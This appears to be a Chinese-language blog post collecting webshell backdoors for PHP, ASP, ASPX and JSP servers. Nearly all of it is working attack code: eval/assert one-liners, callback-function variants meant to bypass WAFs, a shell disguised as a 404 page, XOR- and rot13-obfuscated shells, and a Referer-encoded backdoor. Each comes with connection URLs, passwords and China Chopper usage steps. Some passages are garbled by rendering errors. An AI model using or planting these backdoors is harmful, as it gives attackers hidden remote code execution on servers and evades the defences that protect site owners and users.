目录
经典一句话
利用简单的拼接字符串
利用php回调函数等技巧绕过WAF的方法(姑且简称“回调后门”吧)
- 利用 array_filter+base64_decode
2.利用array_map+base64_decode
3.利用uasort+base64_decode
4.利用array_walk+preg_replace
5.利用array_walk_recursive+preg_replace
6.利用mb_ereg_replace
7.利用preg_filter
8.利用register_shutdown_function
9.利用register_tick_function
10.利用filter_var
强悍的PHP一句话后门
利用404页面隐藏PHP小马:
无特征隐藏PHP一句话:
超级隐蔽的PHP后门:
层级请求,编码运行PHP后门:
PHP后门生成工具weevely
三个变形的一句话PHP木马
第一个
第二个
第三个
最后列几个高级的PHP一句话木马后门:
经典一句话
PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request(“pass”)%>
.NET: <%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>
我们写一句话最终还是要拼接成经典的一句话的,当然,实现方式不止eval,还可以是assert,而且很多时候用菜刀连接的时候使用的是assert,具体原因见 从底层分析eval和assert的区别
利用简单的拼接字符串
<?php
$POST['POST']='assert';
$array[]=$POST;
$array[0]['POST']($_POST['joker']);
?>
菜刀连接用法: http://www.xxx.com/1.php
密码:joker
详解: assert,是php代码执行函数,与eval()有同样的功能,应为 array[0][‘POST’]的输出就是assert,所以组成了一句话木马
assert($_POST[‘joker’]),直接用菜刀链接即可
<?php
error_reporting(0);
$g = array('','s');
$gg = a.$g[1].ser.chr('116');
@$gg($_POST[joker]);
?>
菜刀连接用法: http://www.xxx.com/2.php
密码:joker
详解:
_POST[joker]),是我们常见的一句话木马,直接菜刀链接即可
利用php回调函数等技巧绕过WAF的方法(姑且简称“回调后门”吧)
-
利用 array_filter+base64_decode
<?php $e = $_REQUEST['e']; $arr = array($_POST['settoken'],); array_filter($arr, base64_decode($e)); ?>
用法:
http://www.xxx.com/settoken.php?e=YXNzZXJ0 (这里的“YXNzZXJ0 ”是assert用base64加密后的,因为源码用到了base64_decode)
浏览器提交POST:settoken=phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=YXNzZXJ0
密码:settoken
补充:
array_filter()回调函数,原型为:
array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )
依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。这样就构成了assert($_POST[‘POST’])这个经典一句话
2.利用array_map+base64_decode
<?php $e = $_REQUEST['e'];
$arr = array($_POST['settoken'],);
array_map(base64_decode($e), $arr);
?>
类似上一个array_filter,都是php回调函数的利用
用法:同上一个
3.利用uasort+base64_decode
<?php
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['settoken']);
uasort($arr, base64_decode($e));
?>
<?php
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['settoken'] => 2);
uksort($arr, $e);
?>
用法类似
再给出这两个函数,面向对象的方法:
// method 0
$arr = new ArrayObject(array(‘test’, $_REQUEST[‘pass’]));
$arr->uasort(‘assert’);
// method 1
$arr = new ArrayObject(array(‘test’ => 1, $_REQUEST[‘pass’] => 2));
$arr->uksort(‘assert’);
再来两个类似的回调后门:
$e = $_REQUEST[‘e’];
$arr = array(1);
$e = $_REQUEST[‘e’];
_POST[‘pass’]);
arr, $arr2, $e);
以上几个都是可以直接菜刀连接的一句话,但目标PHP版本在5.4.8及以上才可用.
php中,可以执行代码的函数:
1: 一个参数:assert
2: 两个参数:assert(php5.4.8+)
3: 三个参数:preg_replace /e模式
三个参数可以用preg_replace。所以我这里构造了一个array_walk+preg_replace的回调后门:
4.利用array_walk+preg_replace
<?php $e = $_REQUEST['e'];
$arr = array($_POST['settoken'] => '|.*|e',);
array_walk($arr, $e, '');
?>
用法:
http://www.xxx.com/settoken.php?e=preg_replace
浏览器提交POST:settoken=phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=preg_replace
密码:settoken
这个后门可以在php5.3下使用.
5.利用array_walk_recursive+preg_replace
<?php $e = $_REQUEST['e'];
$arr = array($_POST['settoken'] => '|.*|e',);
array_walk_recursive($arr, $e, '');
?>
用法:
http://www.xxx.com/settoken.php?e=preg_replace
浏览器提交POST:settoken=phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=preg_replace
密码:settoken
看了以上几个回调后门,发现preg_replace确实好用.但显然很多WAF和安全狗 DD盾什么的早就盯上这个函数了.其实php里不止这个函数可以执行eval的功能,还有几个类似的:
6.利用mb_ereg_replace
7.利用preg_filter
<?php echo preg_filter('|.*|e', $_REQUEST['settoken'], ''); ?>第六个 第七个的用法:
http://www.xxx.com/settoken.php?e=assert
浏览器提交POST:settoken=phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=assert
密码:settoken
推荐这个单参数后门,在各个版本都比较好驾驭. 这里给出几个好用不杀的回调后门
8.利用register_shutdown_function
<?php
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['settoken']);
?>
这个函数的官方文档点击这里
这个是php全版本支持的,且不报不杀稳定执行.
详解:register_shutdown_function()函数是来注册一个会在PHP中止时执行的函数,
PHP中止的情况有三种:
执行完成
exit/die导致的中止
发生致命错误中止
,这样的话等到php函数执行完成,就会调用我们传进去的php中止时执行的函数
构成 assert($_REQUEST[‘joker’]) ,一句话木马 ,直接用菜刀链接即可.
用法:
浏览器GET提交:http://www.xxx.com/settoken.php?e=assert&settoken=phpinfo();
即可执行phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=assert
密码:settoken
9.利用register_tick_function
<?php $e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function($e, $_REQUEST['settoken']);
?>
详解:register_tick_function函数必须要和declare流程控制机制合并使用,那么就先了解一下declare和tick:Tick 是一个在 declare 代码段中解释器每执行 N 条低级语句就会发生的事件。N 的值是在 declare 中的 directive 部分用 ticks=N 来指定的。在每个 tick 中出现的事件是由 register_tick_function() 来指定的。也就是说当ticks=1,每执行1行代码,就需要运行一次我们传过来的assert()函数,$_REQUEST[‘joker’]是参数
这样就构成了assert($_REQUEST[‘joker’]) ,直接用菜刀链接一句话木马即可
用法:
浏览器GET提交:http://www.xxx.com/settoken.php?e=assert&settoken=phpinfo();
即可执行phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=assert
密码:settoken
10.利用filter_var
<?php
filter_var($_REQUEST['settoken'], FILTER_CALLBACK, array('options' => 'assert'));
?>
filter_var函数介绍点击这里
用法:
浏览器GET提交:http://www.xxx.com/settoken.php?e=assert&settoken=phpinfo();
即可执行phpinfo();
菜刀连接用法:http://www.xxx.com/settoken.php?e=assert
密码:settoken
强悍的PHP一句话后门
转自
利用404页面隐藏PHP小马:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
404页面是网站常用的文件,一般创建好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。
无特征隐藏PHP一句话:
<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
?>
将POST[′code′]的内容赋值给POST[′code′]的内容赋值给_SESSION[‘theCode’],然后执行$_SESSION[‘theCode’],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。
超级隐蔽的PHP后门:
<?php $_GET[a]($_GET[b]);?>
仅用GET函数就构成了木马;
利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。
层级请求,编码运行PHP后门:
<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9)
{
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>
文件2:
<?php
//2.php
header('Content-type:text/html;charset=utf-8');
//要执行的代码
$code = <<<CODE
phpinfo();
CODE;
//进行base64编码
$code = base64_encode($code);
//构造referer字符串
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
CURLOPT_URL => $url,
CURLOPT_HEADER => FALSE,
CURLOPT_RETURNTRANSFER => TRUE,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);
?>
通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf对referer这些检测要松一点,或者没有检测。用这个思路bypass waf不错。
PHP后门生成工具weevely
weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。
weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描,结果显示该文件无任何威胁。
以上是大概介绍下边是截图,相关使用方法亦家就不在这介绍了,简单的科普一下。
那些强悍的PHP一句话后门
三个变形的一句话PHP木马
第一个
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
在菜刀里写 site/1.php?2=assert 密码是1
第二个
<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
<?php
@$_++;
$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");
$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");
${$__}[!$_](${$___}[$_]);
?>
1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。
2、$++;这行代码的意思是对变量名为""的变量进行自增操作,在PHP中未定义的变量默认值为null,nullfalse0,可以在不使用任何数字的情况下,
通过对未定义变量的自增操作来得到一个数字。
3、$__=(""^"?").(":"^"}").("%"^"
").("{"^"/");
("`"^"?") 01100000^00111111=01011111 —>”_”
(":"^"}") 00111010^01111101=01000111—>”G”
("%"^"`") 00100101^01100000=01000101—>”E”
("{"^"/") 01111011^ 00101111=01010100—>”T”
得到$__=_GET
4、KaTeX parse error: Expected group after '_' at position 1: _̲__=("""{").("~"".").("/""`").("-""~").("("^"|");
("$"^"{") 00100100^01111011=01011111—>”_”
("~"^".") 01111110^00101110=01010000—>”P”
("/"^"`") 00101111^01100000=01001111—>”O”
("-"^"~") 00101101^01111110=01010011—>”S”
("("^"|") 00101000^01111100=01010100—>”T”
得到$___=_POST
5、KaTeX parse error: Expected '}', got 'EOF' at end of input: {__}[! {KaTeX parse error: Expected group after '_' at position 1: _̲__}[_]);
得到 _POST[1]);
6、构造一句话木马,将“0”当成参数,赋值为“assert”
7、使用菜刀工具连接,地址
在菜刀里写 site/2.php?_=assert&__=eval($_POST[‘pass’]) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。
第三个
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血!
最后列几个高级的PHP一句话木马后门:
1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
2、
$filename=$_GET['xbid'];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
5、include ($uid);
//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句话
6、典型一句话
程序后门代码
<?php eval_r($_POST[sb])?>
程序代码
<?php @eval_r($_POST[sb])?>
//容错代码
程序代码
<?php assert($_POST[sb]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
<?$_POST['sa']($_POST['sb']);?>
程序代码
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
<O>h=@eval_r($_POST1);</O>
程序代码
<script language="php">@eval_r($_POST[sb])</script>
//绕过<?限制的一句话
常见的asp一句话后门收集
asp一句话木马:
<%%25Execute(request("a"))%%25>
<%Execute(request("a"))%>
%><%execute request("a")%><%
<script language=VBScript runat=server>execute request("a")</script>
<%25Execute(request("a"))%25>
%><%execute request("yy")%>
<%execute request(char(97))%>
<%eval request(char(97))%>
":execute request("value"):a="
<script language=VBScript runat=server>if request(chr(35))<>"""" then
ExecuteGlobal request(chr(35)) </script>
在数据库里插入的一句话木马
┼攠數畣整爠煥敵瑳∨∣┩愾
┼癥污爠煥敵瑳∨≡┩> 密码为: a
php一句话
<?php eval($_POST[cmd]);?>
<?php system($_REQUEST['cmd']);?>
aspx一句话
<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>
JSP一句话后门
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>